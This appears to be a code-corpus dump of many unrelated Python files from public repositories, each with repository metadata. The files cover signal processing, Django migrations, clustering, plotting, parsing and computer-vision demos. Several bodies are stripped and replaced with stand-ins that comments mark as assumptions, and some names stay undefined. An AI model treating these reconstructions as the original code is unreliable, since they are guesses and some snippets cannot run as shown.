round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
avg_line_length: 34.849462 | max_line_length: 121 | alphanum_fraction: 0.538671

hexsha: 4c517119112a50b7dbf0616dc32615e3180ecafa | size: 3,427 | ext: py | lang: Python
max_stars_repo: applications/tensorflow/cnns/models/resnet.py @ xihuaiwen/chinese_bert (631afbc76c40b0ac033be2186e717885246f446c) | licenses: ["MIT"] | stars: null
max_issues_repo: applications/tensorflow/cnns/models/resnet.py @ xihuaiwen/chinese_bert (631afbc76c40b0ac033be2186e717885246f446c) | licenses: ["MIT"] | issues: null
max_forks_repo: applications/tensorflow/cnns/models/resnet.py @ xihuaiwen/chinese_bert (631afbc76c40b0ac033be2186e717885246f446c) | licenses: ["MIT"] | forks: null
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
avg_line_length: 38.505618 | max_line_length: 101 | alphanum_fraction: 0.569594

hexsha: 4c545b9b4e257d67ea1869f9e75cf7e1b7bca4c8 | size: 613 | ext: py | lang: Python
max_stars_repo: backend/app/migrations/0021_auto_20201205_1846.py @ mareknowak98/AuctionPortal (0059fec07d51c6942b8af73cb8c4f9962c21fc97) | licenses: ["MIT"] | stars: null
max_issues_repo: backend/app/migrations/0021_auto_20201205_1846.py @ mareknowak98/AuctionPortal (0059fec07d51c6942b8af73cb8c4f9962c21fc97) | licenses: ["MIT"] | issues: null
max_forks_repo: backend/app/migrations/0021_auto_20201205_1846.py @ mareknowak98/AuctionPortal (0059fec07d51c6942b8af73cb8c4f9962c21fc97) | licenses: ["MIT"] | forks: null
# Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
avg_line_length: 25.541667 | max_line_length: 73 | alphanum_fraction: 0.60522

hexsha: 4c551d5c25c26d348d1738fdb22529ee094e17ed | size: 8,942 | ext: py | lang: Python
max_stars_repo: rawcdf_extract.py @ bedaro/ssm-analysis (09880dbfa5733d6301b84accc8f42a5ee320d698) | licenses: ["MIT"] | stars: null
max_issues_repo: rawcdf_extract.py @ bedaro/ssm-analysis (09880dbfa5733d6301b84accc8f42a5ee320d698) | licenses: ["MIT"] | issues: null
max_forks_repo: rawcdf_extract.py @ bedaro/ssm-analysis (09880dbfa5733d6301b84accc8f42a5ee320d698) | licenses: ["MIT"] | forks: null
#!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
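# (the chunking helper the comment above refers to was stripped; this is
# the well-known recipe from that answer)
def chunks(lst, n):
    """Yield successive n-sized chunks from lst."""
    for i in range(0, len(lst), n):
        yield lst[i:i + n]

# The InputAttr enum was also stripped; attr_strings below needs at least
# these members (the values are assumptions):
class InputAttr(Enum):
    ALL = 1
    BOTTOM = 2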
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
if __name__ == "__main__": main()
avg_line_length: 40.461538 | max_line_length: 117 | alphanum_fraction: 0.64225

hexsha: 4c55251ed58f769e9fbe55114b14a016770952cb | size: 1,075 | ext: py | lang: Python
max_stars_repo: libcity/executor/map_matching_executor.py @ nadiaaaaachen/Bigscity-LibCity (d8efd38fcc238e3ba518c559cc9f65b49efaaf71) | licenses: ["Apache-2.0"] | stars: 1 (2021-11-22T12:22:32.000Z to 2021-11-22T12:22:32.000Z)
max_issues_repo: libcity/executor/map_matching_executor.py @ yuanhaitao/Bigscity-LibCity (9670c6a2f26043bb8d9cc1715780bb599cce2cd5) | licenses: ["Apache-2.0"] | issues: null
max_forks_repo: libcity/executor/map_matching_executor.py @ yuanhaitao/Bigscity-LibCity (9670c6a2f26043bb8d9cc1715780bb599cce2cd5) | licenses: ["Apache-2.0"] | forks: null
from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
avg_line_length: 29.861111 | max_line_length: 94 | alphanum_fraction: 0.652093

hexsha: 4c55a30419a518ea1054e9871ae5c2c7cf5db9f5 | size: 307 | ext: py | lang: Python
max_stars_repo: project1/budget/migrations/0005_delete_hiddenstatus_budget.py @ sujeethiremath/Project-1 (7f0bff66287d479e231e123615f2df18f9107178) | licenses: ["MIT"] | stars: null
max_issues_repo: project1/budget/migrations/0005_delete_hiddenstatus_budget.py @ sujeethiremath/Project-1 (7f0bff66287d479e231e123615f2df18f9107178) | licenses: ["MIT"] | issues: null
max_forks_repo: project1/budget/migrations/0005_delete_hiddenstatus_budget.py @ sujeethiremath/Project-1 (7f0bff66287d479e231e123615f2df18f9107178) | licenses: ["MIT"] | forks: null
# Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
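# The Migration class was stripped from this dump. Judging from the file
# name, the body was a single DeleteModel operation; the dependency entry
# and the exact model name below are assumptions:
class Migration(migrations.Migration):

    dependencies = [
        ('budget', '0004_auto'),  # placeholder
    ]

    operations = [
        migrations.DeleteModel(name='HiddenStatus_Budget'),
    ]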
avg_line_length: 18.058824 | max_line_length: 47 | alphanum_fraction: 0.618893

hexsha: 4c55bbb06ea35dd59d573da6a8f782da8c81fbf2 | size: 3,548 | ext: py | lang: Python
max_stars_repo: tutorial/43.py @ mssung94/daishin-trading-system (d6682495afb7a08e68db65537b1d1789f2996891) | licenses: ["MIT"] | stars: 2 (2020-11-21T08:45:26.000Z to 2020-11-21T08:50:56.000Z)
max_issues_repo: tutorial/43.py @ mssung94/daishin-trading-system (d6682495afb7a08e68db65537b1d1789f2996891) | licenses: ["MIT"] | issues: null
max_forks_repo: tutorial/43.py @ mssung94/daishin-trading-system (d6682495afb7a08e68db65537b1d1789f2996891) | licenses: ["MIT"] | forks: null
# This example compares the two request styles of the CYBOS Plus API.
#
# BlockRequest sends a request and blocks until the reply arrives, so the
# result can be read right after the call returns.
#
# Request returns immediately instead; the reply is delivered later through
# the Received event, so the caller has to pump Windows messages until the
# event handler signals that the data has arrived.
#
# Section 1 below uses BlockRequest, section 2 uses Request plus a message
# pump.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event

g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)

def MessagePump(timeout):
    waitables = [StopEvent]
    while 1:
        rc = win32event.MsgWaitForMultipleObjects(
            waitables,
            0,        # Wait for all = false, so it waits for anyone
            timeout,  # (or win32event.INFINITE)
            win32event.QS_ALLEVENTS)  # Accepts all input

        if rc == win32event.WAIT_OBJECT_0:
            # Our first event listed, the StopEvent, was triggered, so we must exit
            print('stop event')
            break
        elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
            # A windows message is waiting - take care of it. (Don't ask me
            # why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
            # This message-serving MUST be done for COM, DDE, and other
            # Windowsy things to work properly!
            print('pump')
            if pythoncom.PumpWaitingMessages():
                break  # we received a wm_quit message
        elif rc == win32event.WAIT_TIMEOUT:
            print('timeout')
            return
            pass
        else:
            print('exception')
            raise RuntimeError("unexpected win32wait return value")
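# CpCurReply was stripped from this dump. A minimal stand-in (the class
# names and event-sink shape are assumptions) that signals StopEvent once
# the COM object's Received event fires:
class CpCurReplyEvents:
    def OnReceived(self):
        win32event.SetEvent(StopEvent)

class CpCurReply:
    def __init__(self, client):
        self.client = client

    def Subscribe(self):
        win32com.client.WithEvents(self.client, CpCurReplyEvents)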
code = 'A005930'

##############################################################
# 1. synchronous call with BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest result')
item = {}
# key names are placeholders; the original non-ASCII keys were stripped
item['name'] = g_objCodeMgr.CodeToName(code)
item['price'] = objStockMst.GetHeaderValue(11)   # current price
item['change'] = objStockMst.GetHeaderValue(12)  # change against previous close
print(item)
print('')

##############################################################
# 2. asynchronous call: Request ==> message pump ==> OnReceived
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)

item = {}
item['name'] = g_objCodeMgr.CodeToName(code)
item['price'] = objStockMst.GetHeaderValue(11)   # current price
item['change'] = objStockMst.GetHeaderValue(12)  # change against previous close
print(item)
avg_line_length: 31.39823 | max_line_length: 84 | alphanum_fraction: 0.590755

hexsha: 4c55db68c1c667219febb6705164366e8f8c7adb | size: 18,439 | ext: py | lang: Python
max_stars_repo: ADPTC_LIB/DPTree_ST.py @ SuilandCoder/ADPTC_LIB (ef5c2b7fcf117c8c90a3841489471289ecbf4562) | licenses: ["MIT"] | stars: null
max_issues_repo: ADPTC_LIB/DPTree_ST.py @ SuilandCoder/ADPTC_LIB (ef5c2b7fcf117c8c90a3841489471289ecbf4562) | licenses: ["MIT"] | issues: null
max_forks_repo: ADPTC_LIB/DPTree_ST.py @ SuilandCoder/ADPTC_LIB (ef5c2b7fcf117c8c90a3841489471289ecbf4562) | licenses: ["MIT"] | forks: null
#%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time

def split_cluster_new(tree, local_density, dc_eps, closest_denser_nodes_id, mixin_near_matrix):
    '''
    Split the decision tree into forests by density connectivity.
    dc_eps: density-connectivity threshold.
    Nodes that cannot be density-connected to anything denser become
    outliers; the rest become cluster roots or stay undecided.
    Returns (outlier_forest, cluster_forest, uncertain_forest).
    '''
    mean_density = np.mean(local_density)
    outlier_forest = {}
    cluster_forest = {}
    uncertain_forest = {}
    not_direct_reach = []
    #* collect nodes whose closest denser node is not one of their neighbors
    for k in range(len(closest_denser_nodes_id)):
        near_nodes = mixin_near_matrix[k]
        if closest_denser_nodes_id[k] not in near_nodes:
            not_direct_reach.append(k)
        pass
    not_direct_reach = np.array(not_direct_reach)
    # not_direct_reach = np.where(closest_dis_denser>eps)[0]
    #* order them by their depth in the tree
    # not_direct_reach = np.array(not_direct_reach)
    depth_list_not_direct_reach = np.zeros(len(not_direct_reach), dtype=np.int16)
    for i in range(len(not_direct_reach)):
        # depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
        depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i], 0)
        pass
    not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
    #* process the deepest nodes first
    start = time.perf_counter()
    while(len(not_direct_reach) > 0):
        #* pop one unreachable node
        node_id = not_direct_reach.pop()
        if(node_id == 129193 or node_id == 61589 or node_id == 123593):
            print(node_id)
        if node_id in tree.sorted_gamma_index[0:10]:
            cluster_forest[node_id] = tree.remove_subtree(node_id)
            continue
        node = tree.node_dir[node_id]
        parent_id = node.parent_id
        parent_node = tree.node_dir[parent_id]
        children = parent_node.getChildren()
        siblings_reliable = [i for i in children if i not in not_direct_reach]  #* directly reachable siblings
        not_reliable_nodes = [i for i in children if i not in siblings_reliable]
        if node_id in not_reliable_nodes:
            not_reliable_nodes.remove(node_id)
        if node_id in siblings_reliable:
            siblings_reliable.remove(node_id)
        pairs_nodes = is_connected_new(tree, local_density, dc_eps, node_id, siblings_reliable, not_reliable_nodes, mixin_near_matrix)
        if len(pairs_nodes) == 0:
            if(node_id == tree.root_node.node_id):
                continue
            if(local_density[node_id] - mean_density * dc_eps) >= 0:
                #* dense enough to form a cluster of its own:
                offspring_id = tree.get_subtree_offspring_id(node_id, [node_id])
                if(len(offspring_id) < local_density[node_id]):
                    uncertain_forest[node_id] = tree.remove_subtree(node_id)
                    pass
                else:
                    cluster_forest[node_id] = tree.remove_subtree(node_id)
                    pass
                pass
            else:
                outlier_forest[node_id] = tree.remove_subtree(node_id)
                pass
            pass
        pass
    end = time.perf_counter()
    print('splitting took %s s' % str(end - start))
    cluster_forest[tree.root_node.node_id] = tree  #* whatever is left is one cluster
    return outlier_forest, cluster_forest, uncertain_forest

def is_connected_new(tree, local_density, dc_eps, cur_node_id, reliable_nodes, not_reliable_nodes, mixin_near_matrix):
    '''
    cur_node_id: the node being tested
    reliable_nodes: siblings that are directly density-reachable
    not_reliable_nodes: siblings that are not
    1. Try to connect cur_node to one of reliable_nodes directly; accept the
       connecting pairs when the connected region is dense enough.
    2. Otherwise walk through not_reliable_nodes ([a,b,c,d,e] is explored as
       [a] against [b,c,d,e], and so on), recursing:
    3. e.g. for [a,b,c]: is_connected_new(..., cur_node_id=a,
       reliable_nodes, not_reliable_nodes=[b,c,d,e])
    '''
    #* 1.
    if(len(reliable_nodes) == 0):
        return []
    for reliable_node_id in reliable_nodes:
        pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id, reliable_node_id, mixin_near_matrix)
        if(len(pairs_nodes) == 0):
            continue
        # return pairs_nodes
        cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id, [cur_node_id])
        local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
        local_density_connected_nodes = np.mean(local_density[connected_nodes])
        if(local_density_connected_nodes > local_density_cur_offspring * dc_eps):
            return pairs_nodes
        pass
    #* 2.
    for i in range(len(not_reliable_nodes)):
        pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id, not_reliable_nodes[i], mixin_near_matrix)
        if(len(pairs_nodes) == 0):
            pairs_nodes = is_connected_new(tree, local_density, dc_eps, not_reliable_nodes[i], reliable_nodes, not_reliable_nodes[i+1:], mixin_near_matrix)
            if(len(pairs_nodes) > 0):
                return pairs_nodes
        else:
            cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id, [cur_node_id])
            local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
            local_density_connected_nodes = np.mean(local_density[connected_nodes])
            if(local_density_connected_nodes > local_density_cur_offspring * dc_eps):
                return pairs_nodes
            # return pairs_nodes
        # #*
        cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id, [cur_node_id])
        local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
        local_density_connected_nodes = np.mean(local_density[connected_nodes])
        if(local_density_connected_nodes > local_density_cur_offspring * dc_eps):
            return pairs_nodes
        if(len(pairs_nodes) == 0):
            pairs_nodes = is_connected_new(tree, local_density, dc_eps, not_reliable_nodes[i], reliable_nodes, not_reliable_nodes[i+1:], mixin_near_matrix)
            if(len(pairs_nodes) > 0):
                return pairs_nodes
        # pass
    return []

def label_these_node_new(outlier_forest, cluster_forest, node_num, uncertain_forest, mixin_near_matrix):
    '''
    Assign a cluster label to every node from the three forests.
    '''
    labels = np.full((node_num), -1, dtype=np.int32)
    for outlier_id in outlier_forest:
        outlier_tree = outlier_forest[outlier_id]
        outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id, [outlier_id])
        labels[outlier_idlist] = -1
        pass
    label = 0
    for tree_id in cluster_forest:
        cluster_tree = cluster_forest[tree_id]
        cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id, [tree_id])
        labels[cluster_idlist] = label
        label = label + 1
        pass
    #todo uncertain nodes take the majority label of their labeled neighbors
    for uncertain_tree_id in uncertain_forest:
        uncertain_tree = uncertain_forest[uncertain_tree_id]
        uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id, [uncertain_tree_id])
        all_near_nodes = np.array([], dtype=np.int32)
        for node_id in uncertain_nodes_id:
            all_near_nodes = np.append(all_near_nodes, mixin_near_matrix[node_id])
            pass
        # all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
        all_near_nodes = np.unique(all_near_nodes)
        all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes] != -1)]
        unique_labels, counts = np.unique(labels[all_near_nodes], return_counts=True)
        if(len(counts) == 0):
            cur_label = -1
        else:
            cur_label = unique_labels[np.argmax(counts)]
        labels[uncertain_nodes_id] = cur_label
        pass
    core_points = cluster_forest.keys()
    return labels, core_points

'''
Builds the DPTree used by CFSFDP-style clustering (clustering by fast
search and find of density peaks).
'''
avg_line_length: 38.575314 | max_line_length: 186 | alphanum_fraction: 0.633548

hexsha: 4c56a26b957f0f1d768b5949bae27c075bbc9817 | size: 10,280 | ext: py | lang: Python
max_stars_repo: datasets/tao/tao.py @ Nik-V9/AirObject (5937e64531f08449e81d2c90e3c6643727efbaf0) | licenses: ["BSD-3-Clause"] | stars: 9 (2022-03-15T17:28:48.000Z to 2022-03-29T12:32:28.000Z)
max_issues_repo: datasets/tao/tao.py @ Nik-V9/AirObject (5937e64531f08449e81d2c90e3c6643727efbaf0) | licenses: ["BSD-3-Clause"] | issues: 1 (2022-03-29T06:03:14.000Z to 2022-03-29T13:38:29.000Z)
max_forks_repo: datasets/tao/tao.py @ Nik-V9/AirObject (5937e64531f08449e81d2c90e3c6643727efbaf0) | licenses: ["BSD-3-Clause"] | forks: 1 (2022-03-15T19:34:06.000Z to 2022-03-15T19:34:06.000Z)
from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
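# The TAO dataset class itself was stripped from this dump; as a PyTorch
# dataset it would follow this shape (every detail below is an assumption):
class TAO(data.Dataset):
    def __init__(self, basedir: str, sequences: Optional[Union[str, list]] = None):
        self.basedir = basedir
        self.sequences = sequences or []

    def __len__(self) -> int:
        return len(self.sequences)

    def __getitem__(self, idx: int):
        raise NotImplementedError("stripped in this dump")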
avg_line_length: 41.788618 | max_line_length: 135 | alphanum_fraction: 0.569163

hexsha: 4c573a085ee0bd360c33de2b14ef3c06c724afc8 | size: 2,572 | ext: py | lang: Python
max_stars_repo: Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py @ The-CJ/Phaazebot (83a9563d210718071d4e2cdcca3b212c87abaf51) | licenses: ["MIT"] | stars: 2 (2017-09-14T08:07:55.000Z to 2021-05-18T05:05:05.000Z)
max_issues_repo: Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py @ The-CJ/Phaazebot (83a9563d210718071d4e2cdcca3b212c87abaf51) | licenses: ["MIT"] | issues: 111 (2018-04-15T14:32:14.000Z to 2021-03-28T21:06:29.000Z)
max_forks_repo: Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py @ The-CJ/Phaazebot (83a9563d210718071d4e2cdcca3b212c87abaf51) | licenses: ["MIT"] | forks: 1 (2018-04-15T13:24:44.000Z to 2018-04-15T13:24:44.000Z)
from typing import TYPE_CHECKING
if TYPE_CHECKING:
    from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
avg_line_length: 28.577778 | max_line_length: 127 | alphanum_fraction: 0.691291

hexsha: 4c59684045a1dab8436432732a93183e33f7d39d | size: 3,853 | ext: py | lang: Python
max_stars_repo: augmentation/ISDA.py @ RichardScottOZ/sota-data-augmentation-and-optimizers (60128ca762ac2864a3b54c43c36d1d5aa2033e5a) | licenses: ["MIT"] | stars: 31 (2020-01-14T20:03:31.000Z to 2022-01-07T08:02:09.000Z)
max_issues_repo: augmentation/ISDA.py @ RichardScottOZ/sota-data-augmentation-and-optimizers (60128ca762ac2864a3b54c43c36d1d5aa2033e5a) | licenses: ["MIT"] | issues: null
max_forks_repo: augmentation/ISDA.py @ RichardScottOZ/sota-data-augmentation-and-optimizers (60128ca762ac2864a3b54c43c36d1d5aa2033e5a) | licenses: ["MIT"] | forks: 6 (2020-03-04T09:31:45.000Z to 2021-11-21T18:47:15.000Z)
import torch
import torch.nn as nn
avg_line_length: 29.868217 | max_line_length: 104 | alphanum_fraction: 0.536465

hexsha: 4c59cbad1a1c628d8be0abf3472039d2b0fe36c6 | size: 22,828 | ext: py | lang: Python
max_stars_repo: netpyne/plotting/plotter.py @ sanjayankur31/netpyne (d8b7e94cabeb27e23e30853ff17ae86518b35ac2) | licenses: ["MIT"] | stars: null
max_issues_repo: netpyne/plotting/plotter.py @ sanjayankur31/netpyne (d8b7e94cabeb27e23e30853ff17ae86518b35ac2) | licenses: ["MIT"] | issues: null
max_forks_repo: netpyne/plotting/plotter.py @ sanjayankur31/netpyne (d8b7e94cabeb27e23e30853ff17ae86518b35ac2) | licenses: ["MIT"] | forks: null
"""
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
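# get_tick_size, autosize and the AnchoredScaleBar class used by
# add_scalebar below were stripped from this dump. Minimal stand-ins for
# the two helper functions, with assumed semantics:
def get_tick_size(axis):
    """Spacing between the first two major ticks."""
    ticks = axis.get_majorticklocs()
    return ticks[1] - ticks[0] if len(ticks) > 1 else 1.0


def autosize(size, maxsize, scale):
    """Halve an oversized scalebar until it fits below maxsize."""
    while size > maxsize:
        size = size / 2.0
    return size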
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
avg_line_length: 34.535552 | max_line_length: 376 | alphanum_fraction: 0.56987

hexsha: 4c5b0cb42835f92d5cfa623b7b0648900462ba33 | size: 1,069 | ext: py | lang: Python
max_stars_repo: examples/simpleWiki.py @ klahnakoski/mo-parsing (885bf3fd61430d5fa15164168b975b18988fcf9e) | licenses: ["MIT"] | stars: 1 (2021-10-30T21:18:29.000Z to 2021-10-30T21:18:29.000Z)
max_issues_repo: examples/simpleWiki.py @ klahnakoski/mo-parsing (885bf3fd61430d5fa15164168b975b18988fcf9e) | licenses: ["MIT"] | issues: 22 (2020-04-15T14:49:30.000Z to 2021-12-22T02:49:52.000Z)
max_forks_repo: examples/simpleWiki.py @ klahnakoski/mo-parsing (885bf3fd61430d5fa15164168b975b18988fcf9e) | licenses: ["MIT"] | forks: null
from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
avg_line_length: 28.131579 | max_line_length: 91 | alphanum_fraction: 0.635173

hexsha: 4c5b215bf00e243da89ca4e94c55e9e94a7ff44a | size: 9,885 | ext: py | lang: Python
max_stars_repo: tests/test_app_settings_dict.py @ wheelercj/app_settings (06224dec0b5baf1eeb92e5a81ca4e8385d4942a6) | licenses: ["MIT"] | stars: null
max_issues_repo: tests/test_app_settings_dict.py @ wheelercj/app_settings (06224dec0b5baf1eeb92e5a81ca4e8385d4942a6) | licenses: ["MIT"] | issues: null
max_forks_repo: tests/test_app_settings_dict.py @ wheelercj/app_settings (06224dec0b5baf1eeb92e5a81ca4e8385d4942a6) | licenses: ["MIT"] | forks: null
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
avg_line_length: 27.84507 | max_line_length: 86 | alphanum_fraction: 0.527466

hexsha: 4c5b696f9bc64bbbc8bda141e564e9a8de0891a8 | size: 5,910 | ext: py | lang: Python
max_stars_repo: demo/demo_FSANET_ssd.py @ jacke121/FSA-Net (c4d60bd38e9d17b0ea33d824ec443a01bdeba015) | licenses: ["Apache-2.0"] | stars: null
max_issues_repo: demo/demo_FSANET_ssd.py @ jacke121/FSA-Net (c4d60bd38e9d17b0ea33d824ec443a01bdeba015) | licenses: ["Apache-2.0"] | issues: null
max_forks_repo: demo/demo_FSANET_ssd.py @ jacke121/FSA-Net (c4d60bd38e9d17b0ea33d824ec443a01bdeba015) | licenses: ["Apache-2.0"] | forks: null
import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
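# Everything between the imports and the entry point (model setup, the SSD
# detection loop, main) was stripped from this dump. The cos/sin import
# strongly suggests the usual head-pose drawing helper; the standard version
# is reproduced here for reference, and main is left as a stub:
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size=100):
    pitch = pitch * np.pi / 180
    yaw = -(yaw * np.pi / 180)
    roll = roll * np.pi / 180
    if tdx is None or tdy is None:
        height, width = img.shape[:2]
        tdx = width / 2
        tdy = height / 2
    # X axis pointing right, drawn in red
    x1 = size * (cos(yaw) * cos(roll)) + tdx
    y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
    # Y axis pointing down, drawn in green
    x2 = size * (-cos(yaw) * sin(roll)) + tdx
    y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
    # Z axis out of the screen, drawn in blue
    x3 = size * (sin(yaw)) + tdx
    y3 = size * (-cos(yaw) * sin(pitch)) + tdy
    cv2.line(img, (int(tdx), int(tdy)), (int(x1), int(y1)), (0, 0, 255), 3)
    cv2.line(img, (int(tdx), int(tdy)), (int(x2), int(y2)), (0, 255, 0), 3)
    cv2.line(img, (int(tdx), int(tdy)), (int(x3), int(y3)), (255, 0, 0), 2)
    return img

def main():
    # The original demo loop (SSD face detection + FSA-Net pose estimation
    # over a video stream) was stripped from this dump.
    raise NotImplementedError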
if __name__ == '__main__':
    main()
avg_line_length: 34.16185 | max_line_length: 122 | alphanum_fraction: 0.577496

hexsha: 4c5b93a68b2014eb34642b9dabeaf09a9053d01e | size: 5,118 | ext: py | lang: Python
